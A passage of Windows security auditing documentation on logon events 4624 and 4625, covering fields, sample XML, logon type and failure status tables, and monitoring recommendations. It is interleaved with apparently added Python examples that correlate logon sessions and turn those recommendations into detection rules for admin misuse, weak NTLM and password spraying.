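    AuditEvent(_t("2015-09-09T02:55:00"), "DC01", 4624, "0x29b379", "CONTOSO\\dadmin", 10),
    AuditEvent(_t("2015-09-09T03:08:39"), "DC01", 4647, "0x29b379", "CONTOSO\\dadmin"),
    AuditEvent(_t("2015-09-09T03:08:40"), "DC01", 4634, "0x29b379", "CONTOSO\\dadmin", 10),
    AuditEvent(_t("2015-09-09T04:00:00"), "DC01", 4624, "0x31c000", "CONTOSO\\dadmin", 4),
    AuditEvent(_t("2015-09-09T04:10:00"), "SRV01", 4624, "0x29b379", "CONTOSO\\svc-backup", 5),
]
# Hypothetical policy: the domain admin account must not log on as Batch or Service.
DISALLOWED = {"CONTOSO\\dadmin": {4, 5}}

if __name__ == "__main__":
    sessions, orphans = build_sessions(SAMPLE_EVENTS)
    for s in sessions:
        print(s["computer"], s["logon_id"], s["account"], s["logon_type"],
              session_seconds(s), "user-initiated" if s["user_initiated"] else "")
    print("logoffs without a matching logon:", [(o.computer, o.logon_id) for o in orphans])
    print("logon type violations:", logon_type_violations(SAMPLE_EVENTS, DISALLOWED))
```

An orphan 4634 is not necessarily suspicious (the logon may predate the start of collection, or the computer may have rebooted), but it is worth surfacing, because the same pattern also appears when logon auditing is switched off while logoff auditing stays on.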
Audit Logon
4/5/2019

Applies to
Windows 10
Windows Server 2016
Audit Logon determines whether the operating system generates audit events when a user attempts to log on
to a computer.
These events are related to the creation of logon sessions and occur on the computer that was accessed. For an
interactive logon, events are generated on the computer that was logged on to. For a network logon, such as
accessing a share, events are generated on the computer that hosts the resource that was accessed.
The following events are recorded:
Logon success and failure.
Logon attempts by using explicit credentials. This event is generated when a process attempts to log on
an account by explicitly specifying that account's credentials. This most commonly occurs in batch
configurations such as scheduled tasks, or when using the RunAs command.
Security identifiers (SIDs) are filtered.
Logon events are essential to tracking user activity and detecting potential attacks.
Event volume:
Low on a client computer.
Medium on domain controllers or network servers.

Computer Type       General Success   General Failure   Stronger Success   Stronger Failure
Domain Controller   Yes               Yes               Yes                Yes
Member Server       Yes               Yes               Yes                Yes
Workstation         Yes               Yes               Yes                Yes
Comments (the same for all three computer types): Audit Logon events, for example, will give you information about which account, when, using which Logon Type, and from which machine logged on to this machine. Failure events will show you failed logon attempts and the reason why these attempts failed.

Events List:
4624(S): An account was successfully logged on.
4625(F): An account failed to log on.
4648(S): A logon was attempted using explicit credentials.
4675(S): SIDs were filtered.
4624(S): An account was successfully logged on.
4/5/2019

Applies to
Windows 10
Windows Server 2016

Subcategory: Audit Logon


Event Description:
This event generates when a logon session is created (on destination machine). It
generates on the computer that was accessed, where the session was created.

Note For recommendations, see Security Monitoring Recommendations for this event.

Event XML:
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
<System>
<Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
<EventID>4624</EventID>
<Version>2</Version>
<Level>0</Level>
<Task>12544</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime="2015-11-12T00:24:35.079785200Z" />
<EventRecordID>211</EventRecordID>
<Correlation ActivityID="{00D66690-1CDF-0000-AC66-D600DF1CD101}" />
<Execution ProcessID="716" ThreadID="760" />
<Channel>Security</Channel>
<Computer>WIN-GG82ULGC9GO</Computer>
<Security />
</System>
- <EventData>
<Data Name="SubjectUserSid">S-1-5-18</Data>
<Data Name="SubjectUserName">WIN-GG82ULGC9GO$</Data>
<Data Name="SubjectDomainName">WORKGROUP</Data>
<Data Name="SubjectLogonId">0x3e7</Data>
<Data Name="TargetUserSid">S-1-5-21-1377283216-344919071-3415362939-500</Data>
<Data Name="TargetUserName">Administrator</Data>
<Data Name="TargetDomainName">WIN-GG82ULGC9GO</Data>
<Data Name="TargetLogonId">0x8dcdc</Data>
<Data Name="LogonType">2</Data>
<Data Name="LogonProcessName">User32</Data>
<Data Name="AuthenticationPackageName">Negotiate</Data>
<Data Name="WorkstationName">WIN-GG82ULGC9GO</Data>
<Data Name="LogonGuid">{00000000-0000-0000-0000-000000000000}</Data>
<Data Name="TransmittedServices">-</Data>
<Data Name="LmPackageName">-</Data>
<Data Name="KeyLength">0</Data>
<Data Name="ProcessId">0x44c</Data>
<Data Name="ProcessName">C:\\Windows\\System32\\svchost.exe</Data>
<Data Name="IpAddress">127.0.0.1</Data>
<Data Name="IpPort">0</Data>
<Data Name="ImpersonationLevel">%%1833</Data>
<Data Name="RestrictedAdminMode">-</Data>
<Data Name="TargetOutboundUserName">-</Data>
<Data Name="TargetOutboundDomainName">-</Data>
<Data Name="VirtualAccount">%%1843</Data>
<Data Name="TargetLinkedLogonId">0x0</Data>
<Data Name="ElevatedToken">%%1842</Data>
</EventData>
</Event>

Required Server Roles: None.
Minimum OS Version: Windows Server 2008, Windows Vista.
Event Versions:
0 - Windows Server 2008, Windows Vista.
1 - Windows Server 2012, Windows 8. Added “Impersonation Level” field.
2 - Windows 10. Added “Logon Information:” section; Logon Type moved to the “Logon Information:” section. Added “Restricted Admin Mode”, “Virtual Account”, “Elevated Token”, “Linked Logon ID”, “Network Account Name” and “Network Account Domain” fields.
Field Descriptions:
Subject:
Security ID [Type = SID]: SID of account that reported information about successful logon or invokes it. Event Viewer automatically tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will see the source data in the event.

Note: A security identifier (SID) is a unique value of variable length used to identify a trustee (security principal). Each account has a unique SID that is issued by an authority, such as an Active Directory domain controller, and stored in a security database. Each time a user logs on, the system retrieves the SID for that user from the database and places it in the access token for that user. The system uses the SID in the access token to identify the user in all subsequent interactions with Windows security. When a SID has been used as the unique identifier for a user or group, it cannot ever be used again to identify another user or group. For more information about SIDs, see Security identifiers.

Account Name [Type = UnicodeString]: the name of the account that reported information about successful logon.
Account Domain [Type = UnicodeString]: subject’s domain or computer name. Formats vary, and include the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For some well-known security principals, such as LOCAL SERVICE or ANONYMOUS LOGON, the value of this field is “NT AUTHORITY”.
For local user accounts, this field will contain the name of the computer or device that this account belongs to, for example: “Win81”.
Logon ID [Type = HexInt64]: hexadecimal value that can help you correlate this event with recent events that might contain the same Logon ID, for example, “4672(S): Special privileges assigned to new logon.”
Logon Information [Version 2]:
Logon Type [Version 0, 1, 2] [Type = UInt32]: the type of logon which was performed. The table below contains the list of possible values for this field.

Logon types and descriptions

LOGON TYPE   LOGON TITLE         DESCRIPTION
2            Interactive         A user logged on to this computer.
3            Network             A user or computer logged on to this computer from the network.
4            Batch               Batch logon type is used by batch servers, where processes may be executing on behalf of a user without their direct intervention.
5            Service             A service was started by the Service Control Manager.
7            Unlock              This workstation was unlocked.
8            NetworkCleartext    A user logged on to this computer from the network. The user's password was passed to the authentication package in its unhashed form. The built-in authentication packages all hash credentials before sending them across the network. The credentials do not traverse the network in plaintext (also called cleartext).
9            NewCredentials      A caller cloned its current token and specified new credentials for outbound connections. The new logon session has the same local identity, but uses different credentials for other network connections.
10           RemoteInteractive   A user logged on to this computer remotely using Terminal Services or Remote Desktop.
11           CachedInteractive   A user logged on to this computer with network credentials that were stored locally on the computer. The domain controller was not contacted to verify the credentials.

Restricted Admin Mode [Version 2] [Type = UnicodeString]: Only populated for RemoteInteractive logon type sessions. This is a Yes/No flag indicating if the credentials provided were passed using Restricted Admin mode. Restricted Admin mode was added in Windows 8.1/Windows Server 2012 R2, but this flag was added to the event in Windows 10.
Reference: http://blogs.technet.com/b/kfalde/archive/2013/08/14/restricted-admin-mode-for-rdp-in-windows-8-1-2012-r2.aspx.
If not a RemoteInteractive logon, then this will be "-" string.
Virtual Account [Version 2] [Type = UnicodeString]: a “Yes” or “No” flag, which indicates if the account is a virtual account (e.g., "Managed Service Account"), which was introduced in Windows 7 and Windows Server 2008 R2 to provide the ability to identify the account that a given Service uses, instead of just using "NetworkService".
Elevated Token [Version 2] [Type = UnicodeString]: a “Yes” or “No” flag. If “Yes” then the session this event represents is elevated and has administrator privileges.
Impersonation Level [Version 1, 2] [Type = UnicodeString]: can have one of these four values:
SecurityAnonymous (displayed as empty string): The server process cannot obtain identification information about the client, and it cannot impersonate the client. It is defined with no value given, and thus, by ANSI C rules, defaults to a value of zero.
SecurityIdentification (displayed as "Identification"): The server process can obtain information about the client, such as security identifiers and privileges, but it cannot impersonate the client. This is useful for servers that export their own objects, for example, database products that export tables and views. Using the retrieved client-security information, the server can make access-validation decisions without being able to use other services that are using the client's security context.
SecurityImpersonation (displayed as "Impersonation"): The server process can impersonate the client's security context on its local system. The server cannot impersonate the client on remote systems. This is the most common type.
SecurityDelegation (displayed as "Delegation"): The server process can impersonate the client's security context on remote systems.
New Logon:
Security ID [Type = SID]: SID of account for which logon was performed. Event Viewer automatically tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will see the source data in the event.

Note: A security identifier (SID) is a unique value of variable length used to identify a trustee (security principal). Each account has a unique SID that is issued by an authority, such as an Active Directory domain controller, and stored in a security database. Each time a user logs on, the system retrieves the SID for that user from the database and places it in the access token for that user. The system uses the SID in the access token to identify the user in all subsequent interactions with Windows security. When a SID has been used as the unique identifier for a user or group, it cannot ever be used again to identify another user or group. For more information about SIDs, see Security identifiers.

Account Name [Type = UnicodeString]: the name of the account for which logon was performed.
Account Domain [Type = UnicodeString]: the new logon account’s domain or computer name. Formats vary, and include the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For some well-known security principals, such as LOCAL SERVICE or ANONYMOUS LOGON, the value of this field is “NT AUTHORITY”.
For local user accounts, this field will contain the name of the computer or device that this account belongs to, for example: “Win81”.
Logon ID [Type = HexInt64]: hexadecimal value that can help you correlate this event with recent events that might contain the same Logon ID, for example, “4672(S): Special privileges assigned to new logon.”
Linked Logon ID [Version 2] [Type = HexInt64]: A hexadecimal value of the paired logon session. If there is no other logon session associated with this logon session, then the value is “0x0”.
Network Account Name [Version 2] [Type = UnicodeString]: User name that will be used for outbound (network) connections. Valid only for NewCredentials logon type. If not NewCredentials logon, then this will be a "-" string.
Network Account Domain [Version 2] [Type = UnicodeString]: Domain for the user that will be used for outbound (network) connections. Valid only for NewCredentials logon type. If not NewCredentials logon, then this will be a "-" string.
Logon GUID [Type = GUID]: a GUID that can help you correlate this event with another event that can contain the same Logon GUID, “4769(S, F): A Kerberos service ticket was requested” event on a domain controller. It also can be used for correlation between a 4624 event and several other events (on the same computer) that can contain the same Logon GUID, “4648(S): A logon was attempted using explicit credentials” and “4964(S): Special groups have been assigned to a new logon.” This parameter might not be captured in the event, and in that case appears as “{00000000-0000-0000-0000-000000000000}”.

Note: GUID is an acronym for 'Globally Unique Identifier'. It is a 128-bit integer number used to identify resources, activities or instances.

Process Information:
Process ID [Type = Pointer]: hexadecimal Process ID of the process that
attempted the logon. Process ID (PID ) is a number used by the operating
system to uniquely identify an active process. To see the PID for a specific
process you can, for example, use Task Manager (Details tab, PID column):

If you convert the hexadecimal value to decimal, you can compare it to the
values in Task Manager.
You can also correlate this process ID with a process ID in other events, for
example, “4688: A new process has been created” Process Information\New
Process ID.
Process Name [Type = UnicodeString]: full path and the name of the
executable for the process.
Network Information:
Workstation Name [Type = UnicodeString]: machine name from which logon
attempt was performed.
Source Network Address [Type = UnicodeString]: IP address of machine
from which logon attempt was performed.
IPv6 address or ::ffff:IPv4 address of a client.
::1 or 127.0.0.1 means localhost.
Source Port [Type = UnicodeString]: source port which was used for logon
attempt from remote machine.
0 for interactive logons.
Detailed Authentication Information:
Logon Process [Type = UnicodeString]: the name of the trusted logon process
that was used for the logon. See event “4611: A trusted logon process has been
registered with the Local Security Authority” description for more information.
Authentication Package [Type = UnicodeString]: The name of the
authentication package which was used for the logon authentication process.
Default packages loaded on LSA startup are located in
“HKLM\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig” registry key.
Other packages can be loaded at runtime. When a new package is loaded a
“4610: An authentication package has been loaded by the Local Security
Authority” (typically for NTLM ) or “4622: A security package has been loaded
by the Local Security Authority” (typically for Kerberos) event is logged to
indicate that a new package has been loaded along with the package name. The
most common authentication packages are:
NTLM – NTLM -family Authentication
Kerberos – Kerberos authentication.
Negotiate – the Negotiate security package selects between Kerberos
and NTLM protocols. Negotiate selects Kerberos unless it cannot be
used by one of the systems involved in the authentication or the calling
application did not provide sufficient information to use Kerberos.
Transited Services [Type = UnicodeString] [Kerberos-only]: the list of transited services. Transited services are populated if the logon was a result of a S4U (Service For User) logon process. S4U is a Microsoft extension to the Kerberos Protocol to allow an application service to obtain a Kerberos service ticket on behalf of a user – most commonly done by a front-end website to access an internal resource on behalf of a user. For more information about S4U, see https://msdn.microsoft.com/library/cc246072.aspx
Package Name (NTLM only) [Type = UnicodeString]: The name of the LAN
Manager sub-package (NTLM -family protocol name) that was used during
logon. Possible values are:
“NTLM V1”
“NTLM V2”
“LM”
Only populated if “Authentication Package” = “NTLM”.
Key Length [Type = UInt32]: the length of NTLM Session Security key.
Typically it has 128 bit or 56 bit length. This parameter is always 0 if
“Authentication Package” = “Kerberos”, because it is not applicable for
Kerberos protocol. This field will also have “0” value if Kerberos was negotiated
using Negotiate authentication package.

Security Monitoring Recommendations
For 4624(S): An account was successfully logged on.

TYPE OF MONITORING REQUIRED / RECOMMENDATION

High-value accounts: You might have high-value domain or local accounts for which you need to monitor each action. Examples of high-value accounts are database administrators, built-in local administrator account, domain administrators, service accounts, domain controller accounts and so on.
Recommendation: Monitor this event with the “New Logon\Security ID” that corresponds to the high-value account or accounts.

Anomalies or malicious actions: You might have specific requirements for detecting anomalies or monitoring potential malicious actions. For example, you might need to monitor for use of an account outside of working hours.
Recommendation: When you monitor for anomalies or malicious actions, use the “New Logon\Security ID” (with other information) to monitor how or when a particular account is being used.

Non-active accounts: You might have non-active, disabled, or guest accounts, or other accounts that should never be used.
Recommendation: Monitor this event with the “New Logon\Security ID” that corresponds to the accounts that should never be used.

Account whitelist: You might have a specific whitelist of accounts that are the only ones allowed to perform actions corresponding to particular events.
Recommendation: If this event corresponds to a “whitelist-only” action, review the “New Logon\Security ID” for accounts that are outside the whitelist.

Accounts of different types: You might want to ensure that certain actions are performed only by certain account types, for example, local or domain account, machine or user account, vendor or employee account, and so on.
Recommendation: If this event corresponds to an action you want to monitor for certain account types, review the “New Logon\Security ID” to see whether the account type is as expected.

External accounts: You might be monitoring accounts from another domain, or “external” accounts that are not allowed to perform certain actions (represented by certain specific events).
Recommendation: Monitor this event for the “Subject\Account Domain” corresponding to accounts from another domain or “external” accounts.

Restricted-use computers or devices: You might have certain computers, machines, or devices on which certain people (accounts) should not typically perform any actions.
Recommendation: Monitor the target Computer (or other target device) for actions performed by the “New Logon\Security ID” that you are concerned about.

Account naming conventions: Your organization might have specific naming conventions for account names.
Recommendation: Monitor “Subject\Account Name” for names that don’t comply with naming conventions.

Because this event is typically triggered by the SYSTEM account, we recommend that you report it whenever “Subject\Security ID” is not SYSTEM.
If “Restricted Admin” mode must be used for logons by certain accounts, use this event to monitor logons by “New Logon\Security ID” in relation to “Logon Type”=10 and “Restricted Admin Mode”=”Yes”. If “Restricted Admin Mode”=”No” for these accounts, trigger an alert.
If you need to monitor all logon events for accounts with administrator privileges, monitor this event with “Elevated Token”=”Yes”.
If you need to monitor all logon events for managed service accounts and group managed service accounts, monitor for events with “Virtual Account”=”Yes”.
To monitor for a mismatch between the logon type and the account that uses it (for example, if Logon Type 4-Batch or 5-Service is used by a member of a domain administrative group), monitor Logon Type in this event.
If your organization restricts logons in the following ways, you can use this event to monitor accordingly:
If the user account “New Logon\Security ID” should never be used to log on from the specific Computer.
If New Logon\Security ID credentials should not be used from Workstation Name or Source Network Address.
If a specific account, such as a service account, should only be used from your internal IP address list (or some other list of IP addresses). In this case, you can monitor for Network Information\Source Network Address and compare the network address with your list of IP addresses.
If a particular version of NTLM is always used in your organization. In this case, you can use this event to monitor Package Name (NTLM only), for example, to find events where Package Name (NTLM only) does not equal NTLM V2.
If NTLM is not used in your organization, or should not be used by a specific account (New Logon\Security ID). In this case, monitor for all events where Authentication Package is NTLM.
If the Authentication Package is NTLM. In this case, monitor for Key Length not equal to 128, because all Windows operating systems starting with Windows 2000 support 128-bit Key Length.
If you monitor for potentially malicious software, or software that is not authorized to request logon actions, monitor this event for Process Name.
If you have a trusted logon processes list, monitor for a Logon Process that is
not from the list.
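The recommendations above are field checks on the 4624 event. The following is an added example, not code from the original page: it parses the 4624 event XML shown earlier into its EventData fields and applies several of those checks as detection rules. Everything in POLICY (the admin SID, the service account SID and its allowed network, the trusted logon process list) and the second, constructed event are assumptions for illustration; the %%1842/%%1843 placeholders are assumed to be the message-table IDs behind the Yes/No flag fields.

```python
"""Added example: parse a 4624 event and apply the monitoring recommendations
above as detection rules. Not code from the original page."""
import ipaddress
import xml.etree.ElementTree as ET

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}
SYSTEM_SID = "S-1-5-18"
# Assumed mapping of the message-table placeholders for the Yes/No flag fields
# (resolve them from the provider's message table in production).
FLAG_YES, FLAG_NO = "%%1842", "%%1843"

# Constructed from the 4624 event XML on this page, trimmed to the fields used.
SAMPLE_4624 = r"""<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><EventID>4624</EventID><Computer>WIN-GG82ULGC9GO</Computer></System>
  <EventData>
    <Data Name="SubjectUserSid">S-1-5-18</Data>
    <Data Name="TargetUserSid">S-1-5-21-1377283216-344919071-3415362939-500</Data>
    <Data Name="TargetUserName">Administrator</Data>
    <Data Name="LogonType">2</Data>
    <Data Name="LogonProcessName">User32</Data>
    <Data Name="AuthenticationPackageName">Negotiate</Data>
    <Data Name="LmPackageName">-</Data>
    <Data Name="KeyLength">0</Data>
    <Data Name="ProcessName">C:\Windows\System32\svchost.exe</Data>
    <Data Name="IpAddress">127.0.0.1</Data>
    <Data Name="RestrictedAdminMode">-</Data>
    <Data Name="ElevatedToken">%%1842</Data>
  </EventData>
</Event>"""

# Hypothetical site policy: every SID, network and name here is an assumption.
ADMIN_SID = "S-1-5-21-1377283216-344919071-3415362939-1105"
SERVICE_SID = "S-1-5-21-1377283216-344919071-3415362939-1201"
POLICY = {
    "admin_sids": {ADMIN_SID},
    "restricted_admin_required": {ADMIN_SID},
    "service_account_sources": {SERVICE_SID: [ipaddress.ip_network("10.0.0.0/8")]},
    "trusted_logon_processes": {"User32", "Winlogon", "Advapi", "Kerberos", "NtLmSsp", "Seclogo"},
}


def parse_event(xml_text):
    """Flatten <EventData><Data Name=...> into a dict, plus the EventID."""
    root = ET.fromstring(xml_text)
    fields = {"EventID": root.findtext("e:System/e:EventID", namespaces=NS)}
    for data in root.findall("e:EventData/e:Data", NS):
        fields[data.get("Name")] = data.text or ""
    return fields


def is_yes(value):
    """Accept either the resolved string or the raw placeholder."""
    return value in ("Yes", FLAG_YES)


def in_networks(ip_text, networks):
    """Source Network Address may be '-', '::1' or '::ffff:1.2.3.4'."""
    try:
        ip = ipaddress.ip_address(ip_text.replace("::ffff:", ""))
    except ValueError:
        return False
    return any(ip in net for net in networks)


def evaluate_4624(f, policy=POLICY):
    """Return the names of the recommendations above that this event trips."""
    hits = []
    target, logon_type = f.get("TargetUserSid"), f.get("LogonType")
    ntlm = f.get("AuthenticationPackageName") == "NTLM"
    if f.get("SubjectUserSid") != SYSTEM_SID:
        hits.append("subject_not_system")
    if (logon_type == "10" and target in policy["restricted_admin_required"]
            and not is_yes(f.get("RestrictedAdminMode"))):
        hits.append("restricted_admin_missing")
    if is_yes(f.get("ElevatedToken")):
        hits.append("elevated_logon")
    if logon_type in ("4", "5") and target in policy["admin_sids"]:
        hits.append("admin_batch_or_service_logon")
    if ntlm and f.get("LmPackageName") != "NTLM V2":
        hits.append("ntlm_not_v2")
    if ntlm and f.get("KeyLength") != "128":
        hits.append("ntlm_weak_key")
    allowed = policy["service_account_sources"].get(target)
    if allowed is not None and not in_networks(f.get("IpAddress", "-"), allowed):
        hits.append("service_account_unexpected_source")
    if f.get("LogonProcessName") not in policy["trusted_logon_processes"]:
        hits.append("untrusted_logon_process")
    return hits


if __name__ == "__main__":
    base = parse_event(SAMPLE_4624)
    print(evaluate_4624(base))  # ['elevated_logon']
    # Constructed variant: admin RDP logon over NTLMv1, 56-bit key, no Restricted Admin.
    rdp = dict(base, LogonType="10", TargetUserSid=ADMIN_SID, RestrictedAdminMode=FLAG_NO,
               AuthenticationPackageName="NTLM", LmPackageName="NTLM V1", KeyLength="56",
               LogonProcessName="NtLmSsp", IpAddress="203.0.113.7", ElevatedToken=FLAG_NO)
    print(evaluate_4624(rdp))  # ['restricted_admin_missing', 'ntlm_not_v2', 'ntlm_weak_key']
```

The rules operate on the flattened dict, so the same function can be fed events exported from a SIEM without the XML step; the `::ffff:` prefix handling matters because, as noted above, Source Network Address is written as an IPv6-mapped IPv4 address for many network logons.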
4625(F): An account failed to log on.
4/5/2019

Applies to
Windows 10
Windows Server 2016
Subcategories: Audit Account Lockout and Audit Logon
Event Description:
This event generates when a logon attempt fails. Under the Audit Account Lockout subcategory it generates if an account logon attempt failed when the account was already locked out, and also for the logon attempt after which the account was locked out; under Audit Logon it generates for other failed logon attempts as well (bad password, disabled account and so on), with the Status and Sub Status fields giving the reason.
It generates on the computer where the logon attempt was made; for example, if the logon attempt was made on a user’s workstation, then the event will be logged on this workstation.
This event generates on domain controllers, member servers, and workstations.

Note: For recommendations, see Security Monitoring Recommendations for this event.

Event XML:
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System>
    <Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
    <EventID>4625</EventID>
    <Version>0</Version>
    <Level>0</Level>
    <Task>12546</Task>
    <Opcode>0</Opcode>
    <Keywords>0x8010000000000000</Keywords>
    <TimeCreated SystemTime="2015-09-08T22:54:54.962511700Z" />
    <EventRecordID>229977</EventRecordID>
    <Correlation />
    <Execution ProcessID="516" ThreadID="3240" />
    <Channel>Security</Channel>
    <Computer>DC01.contoso.local</Computer>
    <Security />
  </System>
  <EventData>
    <Data Name="SubjectUserSid">S-1-5-18</Data>
    <Data Name="SubjectUserName">DC01$</Data>
    <Data Name="SubjectDomainName">CONTOSO</Data>
    <Data Name="SubjectLogonId">0x3e7</Data>
    <Data Name="TargetUserSid">S-1-0-0</Data>
    <Data Name="TargetUserName">Auditor</Data>
    <Data Name="TargetDomainName">CONTOSO</Data>
    <Data Name="Status">0xc0000234</Data>
    <Data Name="FailureReason">%%2307</Data>
    <Data Name="SubStatus">0x0</Data>
    <Data Name="LogonType">2</Data>
    <Data Name="LogonProcessName">User32</Data>
    <Data Name="AuthenticationPackageName">Negotiate</Data>
    <Data Name="WorkstationName">DC01</Data>
    <Data Name="TransmittedServices">-</Data>
    <Data Name="LmPackageName">-</Data>
    <Data Name="KeyLength">0</Data>
    <Data Name="ProcessId">0x1bc</Data>
    <Data Name="ProcessName">C:\Windows\System32\winlogon.exe</Data>
    <Data Name="IpAddress">127.0.0.1</Data>
    <Data Name="IpPort">0</Data>
  </EventData>
</Event>

Required Server Roles: None.
Minimum OS Version: Windows Server 2008, Windows Vista.
Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID]: SID of account that reported information about logon failure. Event Viewer automatically tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will see the source data in the event.

Note: A security identifier (SID) is a unique value of variable length used to identify a trustee (security principal). Each account has a unique SID that is issued by an authority, such as an Active Directory domain controller, and stored in a security database. Each time a user logs on, the system retrieves the SID for that user from the database and places it in the access token for that user. The system uses the SID in the access token to identify the user in all subsequent interactions with Windows security. When a SID has been used as the unique identifier for a user or group, it cannot ever be used again to identify another user or group. For more information about SIDs, see Security identifiers.

Account Name [Type = UnicodeString]: the name of the account that reported information about logon failure.
Account Domain [Type = UnicodeString]: subject’s domain or computer name. Formats vary, and include the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For some well-known security principals, such as LOCAL SERVICE or ANONYMOUS LOGON, the value of this field is “NT AUTHORITY”.
For local user accounts, this field will contain the name of the computer or device that this account belongs to, for example: “Win81”.
Logon Type [Type = UInt32]: the type of logon which was performed. The table below (Windows Logon Types) contains the list of possible values for this field.

LOGON TYPE   LOGON TITLE         DESCRIPTION
2            Interactive         A user logged on to this computer.
3            Network             A user or computer logged on to this computer from the network.
4            Batch               Batch logon type is used by batch servers, where processes may be executing on behalf of a user without their direct intervention.
5            Service             A service was started by the Service Control Manager.
7            Unlock              This workstation was unlocked.
8            NetworkCleartext    A user logged on to this computer from the network. The user's password was passed to the authentication package in its unhashed form. The built-in authentication packages all hash credentials before sending them across the network. The credentials do not traverse the network in plaintext (also called cleartext).
9            NewCredentials      A caller cloned its current token and specified new credentials for outbound connections. The new logon session has the same local identity, but uses different credentials for other network connections.
10           RemoteInteractive   A user logged on to this computer remotely using Terminal Services or Remote Desktop.
11           CachedInteractive   A user logged on to this computer with network credentials that were stored locally on the computer. The domain controller was not contacted to verify the credentials.

Table: Windows Logon Types

Account For Which Logon Failed:
Security ID [Type = SID]: SID of the account that was specified in the logon attempt. Event Viewer automatically tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will see the source data in the event.

Note: A security identifier (SID) is a unique value of variable length used to identify a trustee (security principal). Each account has a unique SID that is issued by an authority, such as an Active Directory domain controller, and stored in a security database. Each time a user logs on, the system retrieves the SID for that user from the database and places it in the access token for that user. The system uses the SID in the access token to identify the user in all subsequent interactions with Windows security. When a SID has been used as the unique identifier for a user or group, it cannot ever be used again to identify another user or group. For more information about SIDs, see Security identifiers.

Account Name [Type = UnicodeString]: the name of the account that was specified in the logon attempt.
Account Domain [Type = UnicodeString]: domain or computer name. Formats vary, and include the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For some well-known security principals, such as LOCAL SERVICE or ANONYMOUS LOGON, the value of this field is “NT AUTHORITY”.
For local user accounts, this field will contain the name of the computer or device that this account belongs to, for example: “Win81”.
Logon ID [Type = HexInt64]: hexadecimal value that can help you correlate this event with recent events that might contain the same Logon ID, for example, “4624: An account was successfully logged on.”
Failure Information:
Failure Reason [Type = UnicodeString]: textual explanation of Status field value. For this event it typically has “Account locked out” value.
Status [Type = HexInt32]: the reason why logon failed. For this event it typically has “0xC0000234” value. The most common status codes are listed in the table below (Windows logon status codes).

STATUS\SUB-STATUS CODE   DESCRIPTION
0xC000005E               There are currently no logon servers available to service the logon request.
0xC0000064               User logon with misspelled or bad user account.
0xC000006A               User logon with misspelled or bad password.
0xC000006D               This is either due to a bad username or authentication information.
0xC000006E               Unknown user name or bad password.
0xC000006F               User logon outside authorized hours.
0xC0000070               User logon from unauthorized workstation.
0xC0000071               User logon with expired password.
0xC0000072               User logon to account disabled by administrator.
0xC00000DC               Indicates the SAM Server was in the wrong state to perform the desired operation.
0xC0000133               Clocks between DC and other computer too far out of sync.
0xC000015B               The user has not been granted the requested logon type (aka logon right) at this machine.
0xC000018C               The logon request failed because the trust relationship between the primary domain and the trusted domain failed.
0xC0000192               An attempt was made to logon, but the Netlogon service was not started.
0xC0000193               User logon with expired account.
0xC0000224               User is required to change password at next logon.
0xC0000225               Evidently a bug in Windows and not a risk.
0xC0000234               User logon with account locked.
0xC00002EE               Failure Reason: An Error occurred during Logon.
0xC0000413               Logon Failure: The machine you are logging onto is protected by an authentication firewall. The specified account is not allowed to authenticate to the machine.
0x0                      Status OK.

Table: Windows logon status codes.


Note To see the meaning of other status\sub-status codes you may also check for status code in the Window
header file ntstatus.h in Windows SDK.
More information: https://dev.windows.com/en-us/downloads
Sub Status [Type = HexInt32]: additional information about logon failure. The most common sub-status
codes listed in the “Table 12. Windows logon status codes.”.
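The Status and Sub Status codes above are what a detector keys on: a stream of bad-password failures from one source against many accounts is a password spray, many against one account is brute force, and 0xC0000234 marks the resulting lockout. The following is an added example, not code from the original page, that decodes the codes from the table and runs those three checks over a constructed batch of 4625 records. The records are plain dicts with only the fields the detector reads; the addresses, account names, thresholds and the ten-minute window are assumptions for illustration.

```python
"""Added example: decode 4625 Status/Sub Status codes and detect password
spraying, brute force and lockouts over a constructed batch of failed logons.
Not code from the original page."""
from collections import defaultdict
from datetime import datetime, timedelta

# Meanings taken from the status code table above.
STATUS_CODES = {
    0xC000005E: "no logon servers available to service the logon request",
    0xC0000064: "user name does not exist",
    0xC000006A: "bad password",
    0xC000006D: "bad user name or authentication information",
    0xC000006E: "unknown user name or bad password",
    0xC000006F: "logon outside authorized hours",
    0xC0000070: "logon from unauthorized workstation",
    0xC0000071: "password expired",
    0xC0000072: "account disabled by administrator",
    0xC0000133: "clock skew between DC and client too large",
    0xC000015B: "requested logon type not granted on this machine",
    0xC0000193: "account expired",
    0xC0000224: "password change required at next logon",
    0xC0000234: "account locked out",
    0xC0000413: "blocked by authentication firewall",
    0x0: "status OK",
}
# Codes that mean "credentials rejected" and therefore feed guessing detection.
BAD_CREDENTIALS = {0xC0000064, 0xC000006A, 0xC000006D, 0xC000006E}


def failure_code(ev):
    """Sub Status is the specific reason when set; otherwise fall back to Status."""
    return int(ev["SubStatus"], 16) or int(ev["Status"], 16)


def describe_failure(status, sub_status):
    """Explain a failure from the hex strings as they appear in the event."""
    code = failure_code({"Status": status, "SubStatus": sub_status})
    return STATUS_CODES.get(code, "unknown code 0x%08X" % code)


def detect_failed_logons(events, window=timedelta(minutes=10),
                         spray_accounts=5, brute_attempts=10):
    """Sliding-window counts per Source Network Address.
    Returns sorted (kind, source, account) tuples; account is '*' for a spray."""
    alerts = set()
    by_source = defaultdict(list)
    for ev in events:
        code = failure_code(ev)
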